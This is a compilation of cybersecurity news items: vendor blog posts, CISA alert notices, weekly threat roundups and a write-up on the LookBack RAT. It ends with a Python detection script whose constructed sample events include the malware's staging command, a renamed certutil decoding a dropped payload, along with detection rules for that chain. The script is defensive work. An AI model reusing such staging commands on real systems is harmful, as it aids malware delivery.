Attivo ThreatStrike Credential Protection hides applications' credential stores and denies unauthorized access to them. For example, only Chrome has access to its own credential store; all other applications are denied. The product protects more than 80 of the most popular Windows applications that attackers target, with more applications planned.

With RedLine Stealer gaining attention lately, the Attivo research team tested the tool to see how far it gets against this protection.

In the following section we first show how easily an attacker can grab such data using RedLine Stealer, and then compare that with what happens when the same tool is run on a machine protected with Attivo Credential Protection.

Figure 1: Credentials Stolen without Attivo’s ThreatStrike Credential Protection

Figure 2: Credential Theft Prevented With Attivo’s ThreatStrike Credential Protection

ThreatStrike Credential Protection from Attivo not only prevents malware from accessing production credentials, but also raises an alert when such behavior is seen. The illustrations below show how these alerts appear in the Events dashboard.

Figure 3: Event-level view of the incident

Figure 4: Detailed endpoint report of the incident

In a constantly changing threat landscape, with advanced persistent threats using stealthy techniques such as credential theft, preventing unauthorized access to saved credentials should be one of the top priorities for security teams. One must not rely on anti-malware or other endpoint protection platforms alone to prevent the use of tools like RedLine Stealer; there is always a new method available to evade endpoint protection technologies.

Attivo Credentials Protection prevents credentials theft by denying access to unauthorized applications. To learn more about the Attivo Networks EDN Suite’s new credential protection capability, read the press release here. For more information on the EDN Suite solution, go here.

The post Preventing Credential Theft by RedLine Stealer Malware appeared first on Attivo Networks.

Original release date: July 7, 2021 | Last revised: July 8, 2021

CISA has published a new [Malware Analysis Report (MAR) on DarkSide Ransomware] and updated Alert AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks, originally released May 11, 2021. This update adds indicators of compromise associated with a DarkSide ransomware variant that executes a dynamic-link library used to delete Volume Shadow copies available on the system.

CISA encourages users and administrators to review the following resources for more information:

AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks
Malware Analysis Report MAR-10337801-1.v1

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: April 22, 2021

CISA has released AR21-112A: CISA Identifies SUPERNOVA Malware During Incident Response, which provides analysis of the compromise of an organization's enterprise network by an advanced persistent threat actor. The report provides the tactics, techniques, and procedures CISA observed during the incident response engagement.

CISA encourages organizations to review AR21-112A for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

AR21-112A

Original release date: April 15, 2021

CISA and the Department of Defense (DoD) Cyber National Mission Force (CNMF) have analyzed additional SolarWinds-related malware variants—referred to as SUNSHUTTLE and SOLARFLARE. One of the analyzed files was identified as a China Chopper webshell server-side component that was observed on a network with an active SUNSHUTTLE infection. The webshell can provide a cyber threat actor an alternative method of accessing a network, even if the SUNSHUTTLE infection was remediated.

The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR).

CISA encourages users and administrators to review Malware Analysis Report MAR-10327841-1.v1, U.S. Cyber Command’s VirusTotal page, and the following resources for more information: 

CISA web page: Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise
CISA web page: Supply Chain Compromise
CISA Alert AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: March 17, 2021

CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) on TrickBot malware. A sophisticated group of cyber criminals is using phishing emails claiming to contain proof of traffic violations to lure victims into downloading TrickBot. TrickBot is a highly modular, multi-stage malware that provides its operators with a full suite of tools to conduct a myriad of illegal cyber activities.

To secure against TrickBot, CISA and the FBI recommend users and administrators review AA21-076A: TrickBot Malware as well as CISA's Fact Sheet: TrickBot Malware for guidance on implementing specific mitigation measures to protect against this activity.

This product is provided subject to this Notification and this Privacy & Use policy.

Industrial Control Systems: The New Target of Malware

During 2020, CISA issued 38 cyber alerts ranging from nation-state actors like Iran and North Korea to known ransomware specifically targeting pipeline operations and notably the last alert issued on December 17, 2020, Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, for the SolarWinds supply chain attack.

2020 represents a 660% increase in cyber alerts over 2019, during which CISA issued five cyber warnings over the full year.

Organizations across the board also saw a growing number of adversaries targeting and attacking industrial control systems (ICS) and operational technology (OT) networks. It’s a trend that is clearly continuing into the new year (‘Dangerous Stuff’: Hackers Tried to Poison Water Supply of Florida Town).

And as the attack surface continues to expand for critical infrastructure with owners and operators adopting new technologies to improve operational efficiencies, the increased vulnerabilities and targeting of ICS systems and OT networks is expected to rise.

The post Industrial Control Systems: The New Target of Malware appeared first on Security Boulevard.

A vulnerability, which was classified as problematic, was found in Malwarebytes up to 3.x on macOS (Anti-Malware Software). Affected is the function posix_spawn of the component Launch Daemon. Upgrading to version 4.0 eliminates this vulnerability.

An anonymous reader quotes a report from ZDNet: For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs.

An issue was discovered in Malwarebytes before 4.0 on macOS. A malicious application was able to perform a privileged action within the Malwarebytes launch daemon. The privileged service improperly…

Expert launched Malvuln, a project to report flaws in malware. The researcher John Page launched malvuln.com, the first website exclusively dedicated to research on security flaws in malware code. The security expert John Page (aka hyp3rlinx) launched malvuln.

Publication date: 11/20/2020

Two Romanian citizens have been arrested for allegedly running the malware encryption services, CyberSeal and Dataprotector, to avoid detection of antivirus software, and the Cyberscan service to test malware against antiviruses.

These services have been offered on the underground market since 2010 for no more than $300 per license, with regular updates and customer support. They have been used by more than 1,560 cybercriminals with different types of malware.

The police operation, coordinated by the European Cybercrime Centre (EC3), resulted in several house searches in Bucharest and Craiova, and the neutralisation of their backend infrastructure in Romania, Norway and the USA.

Tags:
Cybercrime, Encryption, Incident, Internet, Malware, Other critical infrastructures

References:

Romanian duo arrested for running malware encryption service to bypass antivirus software (europol.europa.eu, 20/11/2020, en): https://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software
Romanians arrested for running underground malware services (securityaffairs.co, 22/11/2020, en): https://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html
Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malware (seguridadyfirewall.cl, 23/11/2020, es): https://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html


Since 2016, the NJCCIC has gathered cyber threat intelligence information to develop specific threat profiles on Android malware, ATM malware, botnets, cryptocurrency-mining malware, exploit kits, industrial control systems (ICS) malware, iOS malware, macOS malware, point-of-sale malware, ransomware, and trojans.

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how threat actors are bundling Windscribe VPN installers with backdoors. Also, read about a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications.

Read on:

Windows Backdoor Masquerading as VPN App Installer

This article discusses findings covered in a recent blog from Trend Micro where company researchers warn that Windows users looking to install a VPN app are in danger of downloading one that’s been bundled with a backdoor. The trojanized package in this specific case is the Windows installer for Windscribe VPN and contains the Bladabindi backdoor.

The Evolution of Malicious Shell Scripts

The Unix-programming community commonly uses shell scripts as a simple way to execute multiple Linux commands within a single file. Many users do this as part of a regular operational workload manipulating files, executing programs and printing text. However, as a shell interpreter is available in every Unix machine, it is also an interesting and dynamic tool abused by malicious actors.

Microsoft Says It Detected Active Attacks Leveraging Zerologon Vulnerability

Hackers are actively exploiting the Zerologon vulnerability in real-world attacks, Microsoft’s security intelligence team said on Thursday morning. The attacks were expected to happen, according to security industry experts. Multiple versions of weaponized proof-of-concept exploit code have been published online in freely downloadable form since details about the Zerologon vulnerability were revealed on September 14 by Dutch security firm Secura BV.

Stretched and Stressed: Best Practices for Protecting Security Workers’ Mental Health

Security work is stressful under the best of circumstances, but remote work presents its own challenges. In this article, learn how savvy security leaders can best support their teams today — wherever they’re working. Trend Micro’s senior director of HR for the Americas, Bob Kedrosky, weighs in on how Trend Micro is supporting its remote workers.

Exploitable Flaws Found in Facial Recognition Devices

To gain a more nuanced understanding of the security issues present in facial recognition devices, Trend Micro analyzed the security of four different models: ZKTeco FaceDepot-7B, Hikvision DS-K1T606MF, Telpo TPS980 and Megvii Koala. Trend Micro’s case studies show how these devices can be misused by malicious attackers.

New ‘Alien’ Malware Can Steal Passwords from 226 Android Apps

Security researchers have discovered and analyzed a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications. Named Alien, this new trojan has been active since the start of the year and has been offered as a Malware-as-a-Service (MaaS) offering on underground hacking forums.

Government Software Provider Tyler Technologies Hit by Possible Ransomware Attack

Tyler Technologies, a Texas-based provider of software and services for the U.S. government, started informing customers this week of a security incident that is believed to have involved a piece of ransomware. Tyler’s website is currently unavailable and in emails sent out to customers the company said its internal phone and IT systems were accessed without authorization by an “unknown third party.”

U.S. Justice Department Charges APT41 Hackers Over Global Cyberattacks

On September 16, 2020, the United States Justice Department announced that it was charging five Chinese citizens with hacking crimes committed against over 100 institutions in the United States and abroad. The global hacking campaign went after a diverse range of targets, from video game companies and telecommunications enterprises to universities and non-profit organizations. The five individuals were reportedly connected to the hacking group known as APT41.

Phishers are Targeting Employees with Fake GDPR Compliance Reminders

Phishers are using a bogus GDPR compliance reminder to trick recipients – employees of businesses across several industry verticals – into handing over their email login credentials. In this evolving campaign, the attackers targeted mostly email addresses they could glean from company websites and, to a lesser extent, emails of people who are high in the organization’s hierarchy.

Mispadu Banking Trojan Resurfaces

Recent spam campaigns leading to the URSA/Mispadu banking trojan have been uncovered, as reported by malware analyst Pedro Tavares in a Twitter post and by Seguranca Informatica in a blog post. Mispadu malware steals credentials from users’ systems. This attack targets systems with Spanish and Portuguese as system languages.

A Blind Spot in ICS Security: The Protocol Gateway Part 3: What ICS Security Administrators Can Do

In this blog series, Trend Micro analyzes the impacts of the serious vulnerabilities detected in the protocol gateways that are essential when shifting to smart factories and discusses the security countermeasures that security administrators in those factories must take. In the final part of this series, Trend Micro describes a stealth attack method that abuses a vulnerability as well as informs readers of a vital point of security measures required for the future ICS environment.

Major Instagram App Bug Could’ve Given Hackers Remote Access to Your Phone

Check Point researchers disclosed details about a critical vulnerability in Instagram’s Android app that could have allowed remote attackers to take control over a targeted device just by sending victims a specially crafted image. The flaw lets attackers perform actions on behalf of the user within the Instagram app, including spying on victim’s private messages and deleting or posting photos from their accounts, as well as execute arbitrary code on the device.

Addressing Threats Like Ryuk via Trend Micro XDR

Ryuk has recently been one of the most noteworthy ransomware families and is perhaps the best representation of the new paradigm in ransomware attacks where malicious actors go for quality over sheer quantity. In 2019, the Trend Micro™ Managed XDR and Incident Response teams investigated an incident concerning a Trend Micro customer that was infected with the Ryuk ransomware.

What are your thoughts on the Android Instagram app bug that could allow remote access to user’s phones? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybercriminals Distribute Backdoor with VPN Installer and New ‘Alien’ Malware can Steal Passwords from 226 Android Apps appeared first on .

Using knowledge from the ‘cyber frontline’ to improve our ‘Mitigating malware and ransomware’ guidance.

Gartner predicts the financial impact of cyber attacks resulting in fatal casualties will reach more than US$50 billion by 2023
As more physical industrial sites become connected, leaders themselves will be accountable for their security and safety 

In the age of Industry 4.0 and connected industry, we often discuss the relatively new and growing threat of cyber attacks in the context of financial damage. Ransomware, for example, can jam a steel crowbar into operations, leading to downtime, and subsequently hemorrhaging costs. 

As physical industries become connected and therefore vulnerable to attacks, they face the same risks as every other digital organization. 

But that’s not quite the extent of it. As warehouses, factories, power plants, and other physical facilities are further laden with sensor-based predictive analytics, remote access technologies, control networks, robotics, and other operational technology (OT), system attacks can quickly lead to physical harm to people, destruction of property or environmental disasters.

Previous malware attacks have demonstrated this potential. The Triton malware was found infecting safety systems in Saudi petrochemical plants in 2017. It gave attackers the ability to remotely shut off fail-safe systems in case there was a poisonous-gas leak or a critical failure — the last layer of defense before human life was at risk. 

There have been spear-phishing attacks on members of the US energy sector, allegedly by North Korean hackers; the attempts were thwarted, but could easily have led to attacks devastating the country's infrastructure. As far back as 2015, a hack of Ukraine's power grid caused a blackout affecting 200,000 people, and Kaspersky Lab estimates that over 40% of the ICS computers it monitors were attacked by malware at least once in the first half of 2018.

In 2014, it was reported that the hacking of a control system at a steel mill in Germany meant a blast furnace could not be shut down, leading to "massive" damage to the plant but no reported loss of life.

These cyber-physical security (CPS) incidents are fortunately rare, but are set to increase rapidly in the coming years due to a lack of security focus and spending. If business leaders don't act, they could be held personally accountable when something goes wrong.

Industrial robots welding a metal part in a factory. Source: Shutterstock

The cyber-physical security threat

Gartner defines CPS as systems engineered to orchestrate sensing, computation, control, networking, and analytics to interact with the physical world — including humans. 

They underpin all connected IT, operational technology (OT), and Internet of Things (IoT) efforts where security considerations span both the cyber and physical worlds, such as asset-intensive, critical infrastructure, and clinical healthcare environments.

Gartner predicts that as this type of threat increases, business leaders will be caught off guard as liability for CPS incidents will “pierce the corporate veil” to personal liability for 75% of CEOs by 2024.

“Soon, CEOs won’t be able to plead ignorance or retreat behind insurance policies,” said Katell Thielemann, research vice president at Gartner. “Regulators and governments will react promptly to an increase in serious incidents resulting from failure to secure CPSs, drastically increasing rules and regulations governing them.

“In the U.S., the FBI, NSA and Cybersecurity and Infrastructure Security Agency (CISA) have already increased the frequency and details provided around threats to critical infrastructure-related systems, most of which are owned by private industry.”

Gartner predicts that the financial impact of CPS attacks resulting in fatal casualties will reach more than US$50 billion by 2023. The firm warns that, even with the actual value of human life in the equation, associated costs for organizations in terms of compensation, litigation, insurance, regulatory fines, and reputation loss will be significant. 

“Technology leaders need to help CEOs understand the risks that CPSs represent and the need to dedicate focus and budget to securing them,” said Thielemann. “The more connected CPSs are, the higher the likelihood of an incident occurring.”

With OT, smart buildings, smart cities, connected cars, and autonomous vehicles evolving, incidents in the digital world will have a much greater effect in the physical world as risks, threats and vulnerabilities now exist in a bidirectional, cyber-physical spectrum.

However, many enterprises are not aware of CPSs already deployed in their organization, either due to legacy systems connected to enterprise networks by teams outside of IT or because of new business-driven automation and modernization efforts.

The post CEOs will be held accountable for ‘killer’ malware in future, says Gartner appeared first on TechHQ.

A severe vulnerability exists in almost all signed versions of GRUB2, which is used by most Linux systems. If exploited properly, it would allow attackers to compromise the system's boot process, even when the "Secure Boot" verification mechanism is active.

The flaw was reported by Eclypsium on July 29, although the associated CVE-2020-10713 is dated March 20. While grub2 is most directly associated with Linux systems, dual-boot (or multi-boot) machines open the door to exploitation against other systems such as Windows.

A flaw was found in grub2 versions prior to 2.06. An attacker can use the flaw in GRUB 2 to hijack and tamper with the GRUB verification process. This flaw also allows the Secure Boot protections to be bypassed. In order to load an untrusted or modified kernel, an attacker would first need to establish access to the system, such as gaining physical access, having the ability to alter a pxe-boot network, or having remote access to a networked system with root access. With this access, an attacker could forge a string to cause a buffer overflow by injecting a malicious payload, leading to arbitrary code execution within GRUB. The highest threat from this vulnerability is to data confidentiality and integrity, as well as system availability.

https://cve.mitre.org/cgi-bin//cvename.cgi?name=CVE-2020-10713

According to BleepingComputer's report, the vulnerability has been shared with operating system vendors, computer manufacturers and CERTs/CSIRTs. Advisories and possible mitigations from multiple organizations in the industry are expected to be published today.

We see this as a problem with a low probability of occurrence, or at least a high degree of difficulty, since, as the CVE text quoted above states, special conditions are required before the vulnerability can be exploited. This does not mean we can relax; rather, we should stay alert for the updates that will be arriving from the various vendors.

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Data breach, Cobalt Strike, Lazarus, Misconfigured Tools, and OilRig. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity.

Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Cerberus Banking Trojan Team Breaks Up, Source Code Goes to Auction

(published: July 27, 2020)

The Android banking trojan Cerberus has been put up for sale by the malware's developer. The trojan, which uses overlays to phish banking credentials from users, has been listed with a starting price of $50,000. The operator of Cerberus claims the purchaser will receive the source code, module code and admin panel code, along with the current customer database, which allegedly brings in a monthly profit of $10,000. The sale of Cerberus is allegedly due to the development team breaking up.
Recommendation: Users should be cautious when downloading Android applications, as malicious apps occasionally bypass Google Play Store protections. It is crucial that all permissions of an application be examined prior to download.
Tags: Android Malware, Cerberus, Mobile Malware

Source Code from Dozens of Companies Leaked Online

(published: July 27, 2020)

Source code from a wide range of companies has been leaked because of misconfigured tools. Identified by Tillie Kottmann, the affected companies include Adobe, Disney, Lenovo, Microsoft, Motorola and Nintendo, among many others. Developers' names and hardcoded credentials have been found within the source code.
Recommendation: It is crucial to verify that access control is configured correctly before adding any sensitive data. As this story shows, misconfigured software can leak sensitive information, which could be used for further malicious activity and cause significant harm to a company's reputation.
Tags: Misconfigured tools, Data breach

Dave Data Breach Affects 7.5 Million Users, Leaked on Hacker Forum

(published: July 26, 2020)

Dave, a fintech company that offers overdraft protection, has suffered a data breach. The breach occurred when threat actors gained access to third-party provider Waydev, which enabled access to user data at Dave. The database contained over seven million user records, including addresses, birth dates, email addresses, names and phone numbers. The actor who stole the database first attempted to sell it on a hacker forum, but ended up releasing it for free on another site.
Recommendation: Dave is requiring all users to reset their password; however, users need to be aware that they remain at risk if they use the same password on other sites.
Tags: Data breach, PII, Third party breach

Russia’s GRU Hackers Hit US Government and Energy Targets

(published: July 24, 2020)

The Federal Bureau of Investigation (FBI) and FireEye have both confirmed a series of campaigns by APT28, aka Fancy Bear, the group associated with Russia's GRU. These attacks began in December 2018 and continued until at least May 2020. The initial vector appears to be spearphishing against a number of US government, energy and education organizations. One confirmed victim found no evidence of successful phishing but did confirm that the attackers had stolen multiple mailboxes from its email servers. Other initial access vectors include password spraying and brute force. The long-term motivation behind these attacks is not clear, but it is likely a variation of APT28's past motives, including US election meddling and retaliatory attacks against the Olympic Anti-Doping Agency. The broadening of attacks to the US energy sector is especially troubling, as APT28 is believed to have been behind previous attacks against US and Ukrainian energy infrastructure and Industrial Control Systems (ICS).
Recommendation: Defense in depth, along with well-designed and regular employee training, is critical for all businesses but especially important for governments and industry. Entities responsible for ICS need to be aware of the security issues and vulnerabilities in these systems, and such systems should never be connected to the internet.
Tags: APT28, FancyBear, government, energy sector, spear-phishing

Chinese DJI Drones Come With Backdoor

(published: July 24, 2020)

Researchers from Synacktiv and GRIMM have released reports detailing security issues found within the DJI drone app, developed by Chinese drone manufacturer Da Jiang Innovations. The app comes with an auto-update function that bypasses the Google Play Store; this function could be used to install malicious software on an Android device and send sensitive information directly to DJI's servers. The app requests significant permissions (contacts, microphone, camera, location, storage, change network connectivity) and collects the user's IMSI, IMEI and the serial number of the SIM card in use; arguably, the servers have almost full control of a user's phone, exhibiting similarities to a malware C&C server. The app also uses anti-debugging and encryption techniques to hinder security researchers. DJI has disputed these claims, calling the findings “typical software concerns”, and argued that the US DHS had found no evidence of suspicious data transmission.
Recommendation: All applications should be carefully researched prior to installing them on a personal or work device. Applications that request additional permissions upon installation should be carefully vetted before those permissions are granted. Additionally, all applications, especially free versions, should only be downloaded from trusted vendors.
Tags: Android, drone, backdoor

Garmin Suffers Potential Ransomware Attack

(published: July 24, 2020)

Garmin's services and applications have been experiencing outages over the past week, and reports of a ransomware attack are beginning to surface. Garmin confirmed that its website and mobile app were both down, while also notifying its Taiwanese factories of “two days of planned maintenance.” Researchers from SentinelOne noticed that these outages appeared to correlate with a WastedLocker attack against the company, and several employees likewise alleged that Garmin had been hit by WastedLocker. WastedLocker is ransomware believed to have been developed by the Russian group Evil Corp, better known for its Dridex and BitPaymer attacks. Garmin has not yet commented on a potential attack.
Recommendation: Educate your employees on the risks of opening attachments from unknown senders. Anti-spam and antivirus applications provided by trusted vendors should also be employed. Emails from unknown senders should be treated with caution, and attachments from such senders should not be opened. Furthermore, it is important to have a comprehensive and tested backup solution in place, in addition to a business continuity plan for the unfortunate case of a ransomware infection.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact – T1486
Tags: Garmin, ransomware, Evil Corp, WastedLocker, cybercrime

MATA: Multi-platform Targeted Malware Framework

(published: July 22, 2020)

Security researchers from Kaspersky have identified a new malware framework called “MATA” that targets Windows, Linux and macOS. Researchers believe the framework is linked to the North Korea-based Lazarus APT group. It has been used by the threat actors since April 2018 against entities in Poland, Germany, Turkey, Korea, Japan and India. The targeted organizations include a software company, an e-commerce provider and an Internet Service Provider (ISP). The actors used MATA for various objectives on their victims, such as distributing VHD ransomware and querying victim databases to acquire customer lists. Analysis revealed that a variant of the Manuscrypt malware distributed by Lazarus shares a similar configuration structure with MATA.
Recommendation: Defense in depth is the best way to ensure safety from APTs. Defense in depth involves the layering of defense mechanisms, which can include network and endpoint security, social engineering training (such as exercises to help staff detect phishing emails), and robust threat intelligence capabilities.
Tags: Lazarus, MATA

OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory

(published: July 22, 2020)

Palo Alto Networks' Unit 42 discovered a variant of an OilRig-associated tool that Unit 42 calls RDAT, which uses a novel email-based command and control (C2) channel relying on steganography to hide commands and data within bitmap images attached to emails.
Recommendation: Defense in depth is the best way to ensure safety from APTs. Defense in depth involves the layering of defense mechanisms, which can include network and endpoint security, social engineering training (such as exercises to help staff detect phishing emails), and robust threat intelligence capabilities.
Tags: OilRig, Middle East, Email, C2

Chinese APT Targets India and Hong Kong with Updated MgBot

(published: July 21, 2020)

Researchers from Malwarebytes have released a report detailing the targeting of Indian and Hong Kong entities by an unnamed Chinese APT group. A spearphishing campaign, spoofed to look like email from the Indian Government Information Security Center, was observed targeting Indian government personnel. Once the attached .rar file was downloaded, it would inject a Cobalt Strike variant into the system. Other lure documents, themed around Hong Kong immigration to the UK, were discovered dropping an updated MgBot loader before injecting a Remote Access Trojan (RAT) through the AppMgmt service on Windows. The RAT's strings are either obfuscated or XOR-encoded, making analysis difficult. The targeting by a Chinese APT is likely due to the current climate between China and India as well as the political tensions in Hong Kong. Malwarebytes believes the actor shares TTPs with well-known Chinese groups such as Rancor, KeyBoy and APT40; while still not offering attribution, the analysts believe this APT group has been active since 2014, continuously using variants of MgBot throughout.
Recommendation: Defense in depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.
MITRE ATT&CK: [MITRE PRE-ATT&CK] Spearphishing for Information – T1397 | [MITRE ATT&CK] Access Token Manipulation – T1134 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] BITS Jobs – T1197 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] Data from Local System – T1005 | [MITRE ATT&CK] Exploitation for Privilege Escalation – T1068 | [MITRE ATT&CK] Network Service Scanning – T1046 | [MITRE ATT&CK] Obfuscated Files or Information – T1027
Tags: China, APT, MgBot, Cobalt Strike, India, Hong Kong, spearphishing, lure

Golden Chickens: Evolution Of The MaaS

(published: July 20, 2020)

Researchers from QuoIntelligence observed four new attacks during March and April that used tools from the e-crime group Golden Chickens, which provides Malware-as-a-Service (MaaS). Researchers attributed each attack, with confidence varying from low to moderate, to the groups GC05, GC06.tmp and FIN6. During the analysis, it was found that the Golden Chickens group has updated its tools, such as TerraLoader, more_eggs and VenomLNK, with new features that incorporate anti-analysis techniques, new string obfuscation and a brute-force implementation. Golden Chickens MaaS remains a preferred service provider for top-tier e-crime groups such as FIN6 and Cobalt Group.
Recommendation: Financially themed malspam emails are a common tactic among threat actors; therefore, it is crucial that your employees are aware of their financial institutions' policies regarding electronic communication. If a user is concerned because of the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document with a sense of urgency, and poor grammar, are often indicative of malspam or phishing attacks. Such emails should be avoided and reported to the appropriate personnel.
MITRE ATT&CK: [MITRE ATT&CK] Regsvr32 – T1117 | [MITRE ATT&CK] Code Signing – T1116 | [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information – T1140 | [MITRE ATT&CK] Scheduled Task – T1053 | [MITRE ATT&CK] System Information Discovery – T1082 | [MITRE ATT&CK] System Network Configuration Discovery – T1016 | [MITRE ATT&CK] System Owner/User Discovery – T1033 | [MITRE ATT&CK] Remote File Copy – T1105 | [MITRE ATT&CK] Commonly Used Port – T1043 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] Standard Cryptographic Protocol – T1032 | [MITRE ATT&CK] Exfiltration Over Command and Control Channel – T1041 | [MITRE ATT&CK] User Execution – T1204 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] CMSTP – T1191
Tags: TerraLoader, Golden Chickens

Here’s what’s changed in the NCSC’s guidance on mitigating malware and ransomware.

On August 1, security researchers at Proofpoint reported the details of a spearphishing campaign targeting three different United States utility companies using a malware called “LookBack.” The spearphishing emails, sent between July 19 and July 25, contained a malicious Microsoft Word attachment that installed a Remote Access Trojan (RAT) capable of deleting files, taking screenshots, rebooting machines, and then deleting itself from an infected host.

While Proofpoint was able to confirm the presence of LookBack malware at three companies, it is likely that the malware has infected other organizations as well. The emails used in the spearphishing campaign were made to look as if they came from the National Council of Examiners for Engineering and Surveying (NCEES), an American nonprofit organization that handles professional licensing for engineers and surveyors. Fraudulently using the NCEES logo, the emails carried Word documents embedded with malicious macros that, once enabled, installed and ran the never-before-seen RAT.

Researchers told Threatpost that the emails were blocked before they could infect the unnamed utility companies.

How LookBack Works

According to the report by Proofpoint, LookBack is a RAT that relies on a proxy communication tool to relay data from the infected host to a command-and-control server (C2). The malware can view process, system and file data; delete files; take screenshots; move and click the infected system’s mouse; reboot machines; and delete itself from an infected host.

Researchers said that the LookBack spearphishing campaign used tactics once used by known APT adversaries targeting Japanese corporations in 2018 – which highlights the rapidly evolving nature of malware and its use by nation-state actors.

The Microsoft Word document attached to the phishing emails contains a VBA macro that, when executed, drops three Privacy Enhanced Mail (PEM) files. Certutil.exe is then dropped to decode the PEM files, which are later restored to their true extensions using essentuti.exe. The files then take the name of an open-source binary used by common tools such as Notepad++ (GUP.exe), and carry the C2 configuration. Finally, the macro runs GUP.exe and libcurl.dll to execute the LookBack malware. Once running, LookBack can send and receive numerous commands, such as find files, read files, delete files, write to files, start services, and more.

Has Your Organization Been Exposed to LookBack? Here’s How to Detect It.

Due to the nature of the threat, it is important to have multiple controls in place to detect the related activity. This includes continuous security awareness training for employees and personnel to help them identify fake and malicious emails. But beyond spam filters and firewalls, Nozomi Networks Labs recommends using both anomaly detection technologies, to identify unusual behaviour, and traditional threat detection capabilities, to provide additional context around suspicious actors related to known threats.
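As an added example (not Nozomi's or Proofpoint's code, and not part of the original post) of turning the delivery chain described under “How LookBack Works” into host-based detection logic, the Python below runs three rules over constructed Sysmon-style process-creation records: a certutil decode matched on the PE's OriginalFileName (so a renamed copy such as essentuti.exe is still caught), an Office application spawning GUP.exe, and any process named essentuti.exe. The record fields, the file paths and the sample events are assumptions; only the binary names come from the text above.

```python
import ntpath
import re

# Constructed Sysmon Event ID 1-style records (not real telemetry). Field names
# follow Sysmon's Image / ParentImage / CommandLine / OriginalFileName; the paths
# and the phishing document name are made up for the example.
SAMPLE_EVENTS = [
    {   # Word opens the phishing attachment: benign on its own
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\NCEES_notice.docm"',
        "OriginalFileName": "WinWord.exe",
    },
    {   # The macro runs a renamed copy of certutil.exe to decode a dropped PEM file
        "Image": r"C:\Users\alice\AppData\Local\Temp\essentuti.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": r"essentuti.exe -decode C:\Users\alice\AppData\Local\Temp\a.pem C:\Users\alice\AppData\Local\Temp\GUP.exe",
        "OriginalFileName": "CertUtil.exe",
    },
    {   # The macro launches GUP.exe (which loads libcurl.dll) to run LookBack
        "Image": r"C:\Users\alice\AppData\Local\Temp\GUP.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": r"GUP.exe",
        "OriginalFileName": "gup.exe",
    },
    {   # Legitimate certutil use by an administrator: must not fire the decode rule
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"certutil.exe -verify C:\certs\corp-root.cer",
        "OriginalFileName": "CertUtil.exe",
    },
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
DECODE_FLAG = re.compile(r"(?:^|\s)-(?:decode|decodehex)\b", re.IGNORECASE)


def _base(path):
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()


def detect(events):
    """Return (rule_id, event_index) pairs for records matching LookBack-style TTPs."""
    hits = []
    for i, ev in enumerate(events):
        image = _base(ev.get("Image", ""))
        parent = _base(ev.get("ParentImage", ""))
        original = ev.get("OriginalFileName", "").lower()
        cmdline = ev.get("CommandLine", "")

        # Rule 1: certutil, identified by PE metadata rather than file name, decoding a file.
        if original == "certutil.exe" and DECODE_FLAG.search(cmdline):
            rule = "certutil_decode" if image == "certutil.exe" else "certutil_decode_renamed"
            hits.append((rule, i))

        # Rule 2: an Office application spawning the Notepad++ updater binary GUP.exe.
        if image == "gup.exe" and parent in OFFICE_APPS:
            hits.append(("office_spawns_gup", i))

        # Rule 3: the certutil impersonation name used by this campaign, wherever it runs.
        if image == "essentuti.exe":
            hits.append(("essentuti_process", i))
    return hits


if __name__ == "__main__":
    for rule, idx in detect(SAMPLE_EVENTS):
        print(f"{rule:26s} event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

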